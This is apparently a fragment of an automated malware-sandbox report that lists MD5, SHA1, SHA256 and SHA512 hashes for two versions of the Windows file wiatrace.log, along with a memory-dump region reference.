SHA512 1b22155227ba3951aabf2f002b7a40803cec996d2beacbbb84a6102a6602033f2e928dad14215fdb96ef9a7404a4feb10f0e23a19ce91b48234b1418251c809d

C:\Windows\Debug\WIA\wiatrace.log

MD5 85f4a3350a8920c7c10e7b1141c0a40f
SHA1 65d44d471164b54f11b86c4689610b48d31c41f5
SHA256 da07fe21995a39f7db4e5f256e5d23e8ef424926d415cf5bc9cbf944d4e87f2e
SHA512 d05e49be125c93611eb8100364a6a360a3686391b5c941f05688ecc1361d560b065b9bae2ff284c26cf4ee6fe25efc85894b09a5f756d72469a6d1bba86cc8c8

C:\Windows\Debug\WIA\wiatrace.log

MD5 70134587f5454bd8618f074581b20d8c
SHA1 4af1bf6adc9a695e121d3d207c1c326cdb3d7b23
SHA256 997cc241338e9c099fb8f473e9736a5876bea0b7d715200a0f4ec64ec990f179
SHA512 4716fcd3902256f848dec0be34a8285156cb29518a85043290933a2b49d447f2bc37cdd5c3f81c2bbd14a5925ee38310d8385e6b0e86c5f3fe2bb8ca31119a65

memory/4100-35-0x00007FF7AEF10000-0x00007FF7AF0B1000-memory.dmp